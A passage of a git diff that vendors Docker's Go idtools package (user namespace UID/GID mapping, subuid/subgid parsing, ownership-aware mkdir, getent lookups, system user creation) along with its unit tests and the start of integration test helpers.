+// ownership to the requested uid/gid.  If the directory already exists, this
+// function will still change ownership to the requested uid/gid pair.
+func MkdirAllAs(path string, mode os.FileMode, ownerUID, ownerGID int) error {
+	return mkdirAs(path, mode, ownerUID, ownerGID, true, true)
+}
+
+// MkdirAllNewAs creates a directory (include any along the path) and then modifies
+// ownership ONLY of newly created directories to the requested uid/gid. If the
+// directories along the path exist, no change of ownership will be performed
+func MkdirAllNewAs(path string, mode os.FileMode, ownerUID, ownerGID int) error {
+	return mkdirAs(path, mode, ownerUID, ownerGID, true, false)
+}
+
+// MkdirAs creates a directory and then modifies ownership to the requested uid/gid.
+// If the directory already exists, this function still changes ownership
+func MkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int) error {
+	return mkdirAs(path, mode, ownerUID, ownerGID, false, true)
+}
+
+// GetRootUIDGID retrieves the remapped root uid/gid pair from the set of maps.
+// If the maps are empty, then the root uid/gid will default to "real" 0/0
+func GetRootUIDGID(uidMap, gidMap []IDMap) (int, int, error) {
+	var uid, gid int
+
+	if uidMap != nil {
+		xUID, err := ToHost(0, uidMap)
+		if err != nil {
+			return -1, -1, err
+		}
+		uid = xUID
+	}
+	if gidMap != nil {
+		xGID, err := ToHost(0, gidMap)
+		if err != nil {
+			return -1, -1, err
+		}
+		gid = xGID
+	}
+	return uid, gid, nil
+}
+
+// ToContainer takes an id mapping, and uses it to translate a
+// host ID to the remapped ID. If no map is provided, then the translation
+// assumes a 1-to-1 mapping and returns the passed in id
+func ToContainer(hostID int, idMap []IDMap) (int, error) {
+	if idMap == nil {
+		return hostID, nil
+	}
+	for _, m := range idMap {
+		if (hostID >= m.HostID) && (hostID <= (m.HostID + m.Size - 1)) {
+			contID := m.ContainerID + (hostID - m.HostID)
+			return contID, nil
+		}
+	}
+	return -1, fmt.Errorf("Host ID %d cannot be mapped to a container ID", hostID)
+}
+
+// ToHost takes an id mapping and a remapped ID, and translates the
+// ID to the mapped host ID. If no map is provided, then the translation
+// assumes a 1-to-1 mapping and returns the passed in id #
+func ToHost(contID int, idMap []IDMap) (int, error) {
+	if idMap == nil {
+		return contID, nil
+	}
+	for _, m := range idMap {
+		if (contID >= m.ContainerID) && (contID <= (m.ContainerID + m.Size - 1)) {
+			hostID := m.HostID + (contID - m.ContainerID)
+			return hostID, nil
+		}
+	}
+	return -1, fmt.Errorf("Container ID %d cannot be mapped to a host ID", contID)
+}
+
+// CreateIDMappings takes a requested user and group name and
+// using the data from /etc/sub{uid,gid} ranges, creates the
+// proper uid and gid remapping ranges for that user/group pair
+func CreateIDMappings(username, groupname string) ([]IDMap, []IDMap, error) {
+	subuidRanges, err := parseSubuid(username)
+	if err != nil {
+		return nil, nil, err
+	}
+	subgidRanges, err := parseSubgid(groupname)
+	if err != nil {
+		return nil, nil, err
+	}
+	if len(subuidRanges) == 0 {
+		return nil, nil, fmt.Errorf("No subuid ranges found for user %q", username)
+	}
+	if len(subgidRanges) == 0 {
+		return nil, nil, fmt.Errorf("No subgid ranges found for group %q", groupname)
+	}
+
+	return createIDMap(subuidRanges), createIDMap(subgidRanges), nil
+}
+
+func createIDMap(subidRanges ranges) []IDMap {
+	idMap := []IDMap{}
+
+	// sort the ranges by lowest ID first
+	sort.Sort(subidRanges)
+	containerID := 0
+	for _, idrange := range subidRanges {
+		idMap = append(idMap, IDMap{
+			ContainerID: containerID,
+			HostID:      idrange.Start,
+			Size:        idrange.Length,
+		})
+		containerID = containerID + idrange.Length
+	}
+	return idMap
+}
+
+func parseSubuid(username string) (ranges, error) {
+	return parseSubidFile(subuidFileName, username)
+}
+
+func parseSubgid(username string) (ranges, error) {
+	return parseSubidFile(subgidFileName, username)
+}
+
+// parseSubidFile will read the appropriate file (/etc/subuid or /etc/subgid)
+// and return all found ranges for a specified username. If the special value
+// "ALL" is supplied for username, then all ranges in the file will be returned
+func parseSubidFile(path, username string) (ranges, error) {
+	var rangeList ranges
+
+	subidFile, err := os.Open(path)
+	if err != nil {
+		return rangeList, err
+	}
+	defer subidFile.Close()
+
+	s := bufio.NewScanner(subidFile)
+	for s.Scan() {
+		if err := s.Err(); err != nil {
+			return rangeList, err
+		}
+
+		text := strings.TrimSpace(s.Text())
+		if text == "" || strings.HasPrefix(text, "#") {
+			continue
+		}
+		parts := strings.Split(text, ":")
+		if len(parts) != 3 {
+			return rangeList, fmt.Errorf("Cannot parse subuid/gid information: Format not correct for %s file", path)
+		}
+		if parts[0] == username || username == "ALL" {
+			startid, err := strconv.Atoi(parts[1])
+			if err != nil {
+				return rangeList, fmt.Errorf("String to int conversion failed during subuid/gid parsing of %s: %v", path, err)
+			}
+			length, err := strconv.Atoi(parts[2])
+			if err != nil {
+				return rangeList, fmt.Errorf("String to int conversion failed during subuid/gid parsing of %s: %v", path, err)
+			}
+			rangeList = append(rangeList, subIDRange{startid, length})
+		}
+	}
+	return rangeList, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go
new file mode 100644
index 0000000000..f9eb31c3ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go
@@ -0,0 +1,207 @@
+// +build !windows
+
+package idtools
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+
+	"github.com/docker/docker/pkg/system"
+	"github.com/opencontainers/runc/libcontainer/user"
+)
+
+var (
+	entOnce   sync.Once
+	getentCmd string
+)
+
+func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error {
+	// make an array containing the original path asked for, plus (for mkAll == true)
+	// all path components leading up to the complete path that don't exist before we MkdirAll
+	// so that we can chown all of them properly at the end.  If chownExisting is false, we won't
+	// chown the full directory path if it exists
+	var paths []string
+	if _, err := os.Stat(path); err != nil && os.IsNotExist(err) {
+		paths = []string{path}
+	} else if err == nil && chownExisting {
+		if err := os.Chown(path, ownerUID, ownerGID); err != nil {
+			return err
+		}
+		// short-circuit--we were called with an existing directory and chown was requested
+		return nil
+	} else if err == nil {
+		// nothing to do; directory path fully exists already and chown was NOT requested
+		return nil
+	}
+
+	if mkAll {
+		// walk back to "/" looking for directories which do not exist
+		// and add them to the paths array for chown after creation
+		dirPath := path
+		for {
+			dirPath = filepath.Dir(dirPath)
+			if dirPath == "/" {
+				break
+			}
+			if _, err := os.Stat(dirPath); err != nil && os.IsNotExist(err) {
+				paths = append(paths, dirPath)
+			}
+		}
+		if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) {
+			return err
+		}
+	} else {
+		if err := os.Mkdir(path, mode); err != nil && !os.IsExist(err) {
+			return err
+		}
+	}
+	// even if it existed, we will chown the requested path + any subpaths that
+	// didn't exist when we called MkdirAll
+	for _, pathComponent := range paths {
+		if err := os.Chown(pathComponent, ownerUID, ownerGID); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// CanAccess takes a valid (existing) directory and a uid, gid pair and determines
+// if that uid, gid pair has access (execute bit) to the directory
+func CanAccess(path string, uid, gid int) bool {
+	statInfo, err := system.Stat(path)
+	if err != nil {
+		return false
+	}
+	fileMode := os.FileMode(statInfo.Mode())
+	permBits := fileMode.Perm()
+	return accessible(statInfo.UID() == uint32(uid),
+		statInfo.GID() == uint32(gid), permBits)
+}
+
+func accessible(isOwner, isGroup bool, perms os.FileMode) bool {
+	if isOwner && (perms&0100 == 0100) {
+		return true
+	}
+	if isGroup && (perms&0010 == 0010) {
+		return true
+	}
+	if perms&0001 == 0001 {
+		return true
+	}
+	return false
+}
+
+// LookupUser uses traditional local system files lookup (from libcontainer/user) on a username,
+// followed by a call to `getent` for supporting host configured non-files passwd and group dbs
+func LookupUser(username string) (user.User, error) {
+	// first try a local system files lookup using existing capabilities
+	usr, err := user.LookupUser(username)
+	if err == nil {
+		return usr, nil
+	}
+	// local files lookup failed; attempt to call `getent` to query configured passwd dbs
+	usr, err = getentUser(fmt.Sprintf("%s %s", "passwd", username))
+	if err != nil {
+		return user.User{}, err
+	}
+	return usr, nil
+}
+
+// LookupUID uses traditional local system files lookup (from libcontainer/user) on a uid,
+// followed by a call to `getent` for supporting host configured non-files passwd and group dbs
+func LookupUID(uid int) (user.User, error) {
+	// first try a local system files lookup using existing capabilities
+	usr, err := user.LookupUid(uid)
+	if err == nil {
+		return usr, nil
+	}
+	// local files lookup failed; attempt to call `getent` to query configured passwd dbs
+	return getentUser(fmt.Sprintf("%s %d", "passwd", uid))
+}
+
+func getentUser(args string) (user.User, error) {
+	reader, err := callGetent(args)
+	if err != nil {
+		return user.User{}, err
+	}
+	users, err := user.ParsePasswd(reader)
+	if err != nil {
+		return user.User{}, err
+	}
+	if len(users) == 0 {
+		return user.User{}, fmt.Errorf("getent failed to find passwd entry for %q", strings.Split(args, " ")[1])
+	}
+	return users[0], nil
+}
+
+// LookupGroup uses traditional local system files lookup (from libcontainer/user) on a group name,
+// followed by a call to `getent` for supporting host configured non-files passwd and group dbs
+func LookupGroup(groupname string) (user.Group, error) {
+	// first try a local system files lookup using existing capabilities
+	group, err := user.LookupGroup(groupname)
+	if err == nil {
+		return group, nil
+	}
+	// local files lookup failed; attempt to call `getent` to query configured group dbs
+	return getentGroup(fmt.Sprintf("%s %s", "group", groupname))
+}
+
+// LookupGID uses traditional local system files lookup (from libcontainer/user) on a group ID,
+// followed by a call to `getent` for supporting host configured non-files passwd and group dbs
+func LookupGID(gid int) (user.Group, error) {
+	// first try a local system files lookup using existing capabilities
+	group, err := user.LookupGid(gid)
+	if err == nil {
+		return group, nil
+	}
+	// local files lookup failed; attempt to call `getent` to query configured group dbs
+	return getentGroup(fmt.Sprintf("%s %d", "group", gid))
+}
+
+func getentGroup(args string) (user.Group, error) {
+	reader, err := callGetent(args)
+	if err != nil {
+		return user.Group{}, err
+	}
+	groups, err := user.ParseGroup(reader)
+	if err != nil {
+		return user.Group{}, err
+	}
+	if len(groups) == 0 {
+		return user.Group{}, fmt.Errorf("getent failed to find groups entry for %q", strings.Split(args, " ")[1])
+	}
+	return groups[0], nil
+}
+
+func callGetent(args string) (io.Reader, error) {
+	entOnce.Do(func() { getentCmd, _ = resolveBinary("getent") })
+	// if no `getent` command on host, can't do anything else
+	if getentCmd == "" {
+		return nil, fmt.Errorf("")
+	}
+	out, err := execCmd(getentCmd, args)
+	if err != nil {
+		exitCode, errC := system.GetExitCode(err)
+		if errC != nil {
+			return nil, err
+		}
+		switch exitCode {
+		case 1:
+			return nil, fmt.Errorf("getent reported invalid parameters/database unknown")
+		case 2:
+			terms := strings.Split(args, " ")
+			return nil, fmt.Errorf("getent unable to find entry %q in %s database", terms[1], terms[0])
+		case 3:
+			return nil, fmt.Errorf("getent database doesn't support enumeration")
+		default:
+			return nil, err
+		}
+
+	}
+	return bytes.NewReader(out), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go
new file mode 100644
index 0000000000..540d3079ee
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go
@@ -0,0 +1,271 @@
+// +build !windows
+
+package idtools
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"syscall"
+	"testing"
+)
+
+type node struct {
+	uid int
+	gid int
+}
+
+func TestMkdirAllAs(t *testing.T) {
+	dirName, err := ioutil.TempDir("", "mkdirall")
+	if err != nil {
+		t.Fatalf("Couldn't create temp dir: %v", err)
+	}
+	defer os.RemoveAll(dirName)
+
+	testTree := map[string]node{
+		"usr":              {0, 0},
+		"usr/bin":          {0, 0},
+		"lib":              {33, 33},
+		"lib/x86_64":       {45, 45},
+		"lib/x86_64/share": {1, 1},
+	}
+
+	if err := buildTree(dirName, testTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid
+	if err := MkdirAllAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil {
+		t.Fatal(err)
+	}
+	testTree["usr/share"] = node{99, 99}
+	verifyTree, err := readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// test 2-deep new directories--both should be owned by the uid/gid pair
+	if err := MkdirAllAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil {
+		t.Fatal(err)
+	}
+	testTree["lib/some"] = node{101, 101}
+	testTree["lib/some/other"] = node{101, 101}
+	verifyTree, err = readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// test a directory that already exists; should be chowned, but nothing else
+	if err := MkdirAllAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil {
+		t.Fatal(err)
+	}
+	testTree["usr"] = node{102, 102}
+	verifyTree, err = readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestMkdirAllNewAs(t *testing.T) {
+
+	dirName, err := ioutil.TempDir("", "mkdirnew")
+	if err != nil {
+		t.Fatalf("Couldn't create temp dir: %v", err)
+	}
+	defer os.RemoveAll(dirName)
+
+	testTree := map[string]node{
+		"usr":              {0, 0},
+		"usr/bin":          {0, 0},
+		"lib":              {33, 33},
+		"lib/x86_64":       {45, 45},
+		"lib/x86_64/share": {1, 1},
+	}
+
+	if err := buildTree(dirName, testTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid
+	if err := MkdirAllNewAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil {
+		t.Fatal(err)
+	}
+	testTree["usr/share"] = node{99, 99}
+	verifyTree, err := readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// test 2-deep new directories--both should be owned by the uid/gid pair
+	if err := MkdirAllNewAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil {
+		t.Fatal(err)
+	}
+	testTree["lib/some"] = node{101, 101}
+	testTree["lib/some/other"] = node{101, 101}
+	verifyTree, err = readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// test a directory that already exists; should NOT be chowned
+	if err := MkdirAllNewAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil {
+		t.Fatal(err)
+	}
+	verifyTree, err = readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestMkdirAs(t *testing.T) {
+
+	dirName, err := ioutil.TempDir("", "mkdir")
+	if err != nil {
+		t.Fatalf("Couldn't create temp dir: %v", err)
+	}
+	defer os.RemoveAll(dirName)
+
+	testTree := map[string]node{
+		"usr": {0, 0},
+	}
+	if err := buildTree(dirName, testTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// test a directory that already exists; should just chown to the requested uid/gid
+	if err := MkdirAs(filepath.Join(dirName, "usr"), 0755, 99, 99); err != nil {
+		t.Fatal(err)
+	}
+	testTree["usr"] = node{99, 99}
+	verifyTree, err := readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+
+	// create a subdir under a dir which doesn't exist--should fail
+	if err := MkdirAs(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, 102, 102); err == nil {
+		t.Fatalf("Trying to create a directory with Mkdir where the parent doesn't exist should have failed")
+	}
+
+	// create a subdir under an existing dir; should only change the ownership of the new subdir
+	if err := MkdirAs(filepath.Join(dirName, "usr", "bin"), 0755, 102, 102); err != nil {
+		t.Fatal(err)
+	}
+	testTree["usr/bin"] = node{102, 102}
+	verifyTree, err = readTree(dirName, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := compareTrees(testTree, verifyTree); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func buildTree(base string, tree map[string]node) error {
+	for path, node := range tree {
+		fullPath := filepath.Join(base, path)
+		if err := os.MkdirAll(fullPath, 0755); err != nil {
+			return fmt.Errorf("Couldn't create path: %s; error: %v", fullPath, err)
+		}
+		if err := os.Chown(fullPath, node.uid, node.gid); err != nil {
+			return fmt.Errorf("Couldn't chown path: %s; error: %v", fullPath, err)
+		}
+	}
+	return nil
+}
+
+func readTree(base, root string) (map[string]node, error) {
+	tree := make(map[string]node)
+
+	dirInfos, err := ioutil.ReadDir(base)
+	if err != nil {
+		return nil, fmt.Errorf("Couldn't read directory entries for %q: %v", base, err)
+	}
+
+	for _, info := range dirInfos {
+		s := &syscall.Stat_t{}
+		if err := syscall.Stat(filepath.Join(base, info.Name()), s); err != nil {
+			return nil, fmt.Errorf("Can't stat file %q: %v", filepath.Join(base, info.Name()), err)
+		}
+		tree[filepath.Join(root, info.Name())] = node{int(s.Uid), int(s.Gid)}
+		if info.IsDir() {
+			// read the subdirectory
+			subtree, err := readTree(filepath.Join(base, info.Name()), filepath.Join(root, info.Name()))
+			if err != nil {
+				return nil, err
+			}
+			for path, nodeinfo := range subtree {
+				tree[path] = nodeinfo
+			}
+		}
+	}
+	return tree, nil
+}
+
+func compareTrees(left, right map[string]node) error {
+	if len(left) != len(right) {
+		return fmt.Errorf("Trees aren't the same size")
+	}
+	for path, nodeLeft := range left {
+		if nodeRight, ok := right[path]; ok {
+			if nodeRight.uid != nodeLeft.uid || nodeRight.gid != nodeLeft.gid {
+				// mismatch
+				return fmt.Errorf("mismatched ownership for %q: expected: %d:%d, got: %d:%d", path,
+					nodeLeft.uid, nodeLeft.gid, nodeRight.uid, nodeRight.gid)
+			}
+			continue
+		}
+		return fmt.Errorf("right tree didn't contain path %q", path)
+	}
+	return nil
+}
+
+func TestParseSubidFileWithNewlinesAndComments(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "parsesubid")
+	if err != nil {
+		t.Fatal(err)
+	}
+	fnamePath := filepath.Join(tmpDir, "testsubuid")
+	fcontent := `tss:100000:65536
+# empty default subuid/subgid file
+
+dockremap:231072:65536`
+	if err := ioutil.WriteFile(fnamePath, []byte(fcontent), 0644); err != nil {
+		t.Fatal(err)
+	}
+	ranges, err := parseSubidFile(fnamePath, "dockremap")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(ranges) != 1 {
+		t.Fatalf("wanted 1 element in ranges, got %d instead", len(ranges))
+	}
+	if ranges[0].Start != 231072 {
+		t.Fatalf("wanted 231072, got %d instead", ranges[0].Start)
+	}
+	if ranges[0].Length != 65536 {
+		t.Fatalf("wanted 65536, got %d instead", ranges[0].Length)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go
new file mode 100644
index 0000000000..49f67e78c1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go
@@ -0,0 +1,25 @@
+// +build windows
+
+package idtools
+
+import (
+	"os"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+// Platforms such as Windows do not support the UID/GID concept. So make this
+// just a wrapper around system.MkdirAll.
+func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error {
+	if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) {
+		return err
+	}
+	return nil
+}
+
+// CanAccess takes a valid (existing) directory and a uid, gid pair and determines
+// if that uid, gid pair has access (execute bit) to the directory
+// Windows does not require/support this function, so always return true
+func CanAccess(path string, uid, gid int) bool {
+	return true
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go
new file mode 100644
index 0000000000..9da7975e2c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go
@@ -0,0 +1,164 @@
+package idtools
+
+import (
+	"fmt"
+	"regexp"
+	"sort"
+	"strconv"
+	"strings"
+	"sync"
+)
+
+// add a user and/or group to Linux /etc/passwd, /etc/group using standard
+// Linux distribution commands:
+// adduser --system --shell /bin/false --disabled-login --disabled-password --no-create-home --group <username>
+// useradd -r -s /bin/false <username>
+
+var (
+	once        sync.Once
+	userCommand string
+
+	cmdTemplates = map[string]string{
+		"adduser": "--system --shell /bin/false --no-create-home --disabled-login --disabled-password --group %s",
+		"useradd": "-r -s /bin/false %s",
+		"usermod": "-%s %d-%d %s",
+	}
+
+	idOutRegexp = regexp.MustCompile(`uid=([0-9]+).*gid=([0-9]+)`)
+	// default length for a UID/GID subordinate range
+	defaultRangeLen   = 65536
+	defaultRangeStart = 100000
+	userMod           = "usermod"
+)
+
+// AddNamespaceRangesUser takes a username and uses the standard system
+// utility to create a system user/group pair used to hold the
+// /etc/sub{uid,gid} ranges which will be used for user namespace
+// mapping ranges in containers.
+func AddNamespaceRangesUser(name string) (int, int, error) {
+	if err := addUser(name); err != nil {
+		return -1, -1, fmt.Errorf("Error adding user %q: %v", name, err)
+	}
+
+	// Query the system for the created uid and gid pair
+	out, err := execCmd("id", name)
+	if err != nil {
+		return -1, -1, fmt.Errorf("Error trying to find uid/gid for new user %q: %v", name, err)
+	}
+	matches := idOutRegexp.FindStringSubmatch(strings.TrimSpace(string(out)))
+	if len(matches) != 3 {
+		return -1, -1, fmt.Errorf("Can't find uid, gid from `id` output: %q", string(out))
+	}
+	uid, err := strconv.Atoi(matches[1])
+	if err != nil {
+		return -1, -1, fmt.Errorf("Can't convert found uid (%s) to int: %v", matches[1], err)
+	}
+	gid, err := strconv.Atoi(matches[2])
+	if err != nil {
+		return -1, -1, fmt.Errorf("Can't convert found gid (%s) to int: %v", matches[2], err)
+	}
+
+	// Now we need to create the subuid/subgid ranges for our new user/group (system users
+	// do not get auto-created ranges in subuid/subgid)
+
+	if err := createSubordinateRanges(name); err != nil {
+		return -1, -1, fmt.Errorf("Couldn't create subordinate ID ranges: %v", err)
+	}
+	return uid, gid, nil
+}
+
+func addUser(userName string) error {
+	once.Do(func() {
+		// set up which commands are used for adding users/groups dependent on distro
+		if _, err := resolveBinary("adduser"); err == nil {
+			userCommand = "adduser"
+		} else if _, err := resolveBinary("useradd"); err == nil {
+			userCommand = "useradd"
+		}
+	})
+	if userCommand == "" {
+		return fmt.Errorf("Cannot add user; no useradd/adduser binary found")
+	}
+	args := fmt.Sprintf(cmdTemplates[userCommand], userName)
+	out, err := execCmd(userCommand, args)
+	if err != nil {
+		return fmt.Errorf("Failed to add user with error: %v; output: %q", err, string(out))
+	}
+	return nil
+}
+
+func createSubordinateRanges(name string) error {
+
+	// first, we should verify that ranges weren't automatically created
+	// by the distro tooling
+	ranges, err := parseSubuid(name)
+	if err != nil {
+		return fmt.Errorf("Error while looking for subuid ranges for user %q: %v", name, err)
+	}
+	if len(ranges) == 0 {
+		// no UID ranges; let's create one
+		startID, err := findNextUIDRange()
+		if err != nil {
+			return fmt.Errorf("Can't find available subuid range: %v", err)
+		}
+		out, err := execCmd(userMod, fmt.Sprintf(cmdTemplates[userMod], "v", startID, startID+defaultRangeLen-1, name))
+		if err != nil {
+			return fmt.Errorf("Unable to add subuid range to user: %q; output: %s, err: %v", name, out, err)
+		}
+	}
+
+	ranges, err = parseSubgid(name)
+	if err != nil {
+		return fmt.Errorf("Error while looking for subgid ranges for user %q: %v", name, err)
+	}
+	if len(ranges) == 0 {
+		// no GID ranges; let's create one
+		startID, err := findNextGIDRange()
+		if err != nil {
+			return fmt.Errorf("Can't find available subgid range: %v", err)
+		}
+		out, err := execCmd(userMod, fmt.Sprintf(cmdTemplates[userMod], "w", startID, startID+defaultRangeLen-1, name))
+		if err != nil {
+			return fmt.Errorf("Unable to add subgid range to user: %q; output: %s, err: %v", name, out, err)
+		}
+	}
+	return nil
+}
+
+func findNextUIDRange() (int, error) {
+	ranges, err := parseSubuid("ALL")
+	if err != nil {
+		return -1, fmt.Errorf("Couldn't parse all ranges in /etc/subuid file: %v", err)
+	}
+	sort.Sort(ranges)
+	return findNextRangeStart(ranges)
+}
+
+func findNextGIDRange() (int, error) {
+	ranges, err := parseSubgid("ALL")
+	if err != nil {
+		return -1, fmt.Errorf("Couldn't parse all ranges in /etc/subgid file: %v", err)
+	}
+	sort.Sort(ranges)
+	return findNextRangeStart(ranges)
+}
+
+func findNextRangeStart(rangeList ranges) (int, error) {
+	startID := defaultRangeStart
+	for _, arange := range rangeList {
+		if wouldOverlap(arange, startID) {
+			startID = arange.Start + arange.Length
+		}
+	}
+	return startID, nil
+}
+
+func wouldOverlap(arange subIDRange, ID int) bool {
+	low := ID
+	high := ID + defaultRangeLen
+	if (low >= arange.Start && low <= arange.Start+arange.Length) ||
+		(high <= arange.Start+arange.Length && high >= arange.Start) {
+		return true
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go
new file mode 100644
index 0000000000..d98b354cbd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go
@@ -0,0 +1,12 @@
+// +build !linux
+
+package idtools
+
+import "fmt"
+
+// AddNamespaceRangesUser takes a name and finds an unused uid, gid pair
+// and calls the appropriate helper function to add the group and then
+// the user to the group in /etc/group and /etc/passwd respectively.
+func AddNamespaceRangesUser(name string) (int, int, error) {
+	return -1, -1, fmt.Errorf("No support for adding users or groups on this OS")
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go
new file mode 100644
index 0000000000..9703ecbd9d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go
@@ -0,0 +1,32 @@
+// +build !windows
+
+package idtools
+
+import (
+	"fmt"
+	"os/exec"
+	"path/filepath"
+	"strings"
+)
+
+func resolveBinary(binname string) (string, error) {
+	binaryPath, err := exec.LookPath(binname)
+	if err != nil {
+		return "", err
+	}
+	resolvedPath, err := filepath.EvalSymlinks(binaryPath)
+	if err != nil {
+		return "", err
+	}
+	//only return no error if the final resolved binary basename
+	//matches what was searched for
+	if filepath.Base(resolvedPath) == binname {
+		return resolvedPath, nil
+	}
+	return "", fmt.Errorf("Binary %q does not resolve to a binary of that name in $PATH (%q)", binname, resolvedPath)
+}
+
+func execCmd(cmd, args string) ([]byte, error) {
+	execCmd := exec.Command(cmd, strings.Split(args, " ")...)
+	return execCmd.CombinedOutput()
+}
diff --git a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go b/vendor/github.com/docker/docker/pkg/integration/checker/checker.go
new file mode 100644
index 0000000000..d1b703a599
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/integration/checker/checker.go
@@ -0,0 +1,46 @@
+// Package checker provides Docker specific implementations of the go-check.Checker interface.
+package checker
+
+import (
+	"github.com/go-check/check"
+	"github.com/vdemeester/shakers"
+)
+
+// As a commodity, we bring all check.Checker variables into the current namespace to avoid having
+// to think about check.X versus checker.X.
+var (
+	DeepEquals   = check.DeepEquals
+	ErrorMatches = check.ErrorMatches
+	FitsTypeOf   = check.FitsTypeOf
+	HasLen       = check.HasLen
+	Implements   = check.Implements
+	IsNil        = check.IsNil
+	Matches      = check.Matches
+	Not          = check.Not
+	NotNil       = check.NotNil
+	PanicMatches = check.PanicMatches
+	Panics       = check.Panics
+
+	Contains           = shakers.Contains
+	ContainsAny        = shakers.ContainsAny
+	Count              = shakers.Count
+	Equals             = shakers.Equals
+	EqualFold          = shakers.EqualFold
+	False              = shakers.False
+	GreaterOrEqualThan = shakers.GreaterOrEqualThan
+	GreaterThan        = shakers.GreaterThan
+	HasPrefix          = shakers.HasPrefix
+	HasSuffix          = shakers.HasSuffix
+	Index              = shakers.Index
+	IndexAny           = shakers.IndexAny
+	IsAfter            = shakers.IsAfter
+	IsBefore           = shakers.IsBefore
+	IsBetween          = shakers.IsBetween
+	IsLower            = shakers.IsLower
+	IsUpper            = shakers.IsUpper
+	LessOrEqualThan    = shakers.LessOrEqualThan
+	LessThan           = shakers.LessThan
+	TimeEquals         = shakers.TimeEquals
+	True               = shakers.True
+	TimeIgnore         = shakers.TimeIgnore
+)
diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go
new file mode 100644
index 0000000000..76d04e8df5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go
@@ -0,0 +1,294 @@
+package cmd
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/pkg/system"
+	"github.com/go-check/check"
+)
+
+type testingT interface {
+	Fatalf(string, ...interface{})
+}
+
+const (
+	// None is a token to inform Result.Assert that the output should be empty
+	None string = "<NOTHING>"
+)
+
+type lockedBuffer struct {
+	m   sync.RWMutex
+	buf bytes.Buffer
+}
+
+func (buf *lockedBuffer) Write(b []byte) (int, error) {
+	buf.m.Lock()
+	defer buf.m.Unlock()
+	return buf.buf.Write(b)
+}
+
+func (buf *lockedBuffer) String() string {
+	buf.m.RLock()
+	defer buf.m.RUnlock()
+	return buf.buf.String()
+}
+
+// Result stores the result of running a command
+type Result struct {
+	Cmd      *exec.Cmd
+	ExitCode int
+	Error    error
+	// Timeout is true if the command was killed because it ran for too long
+	Timeout   bool
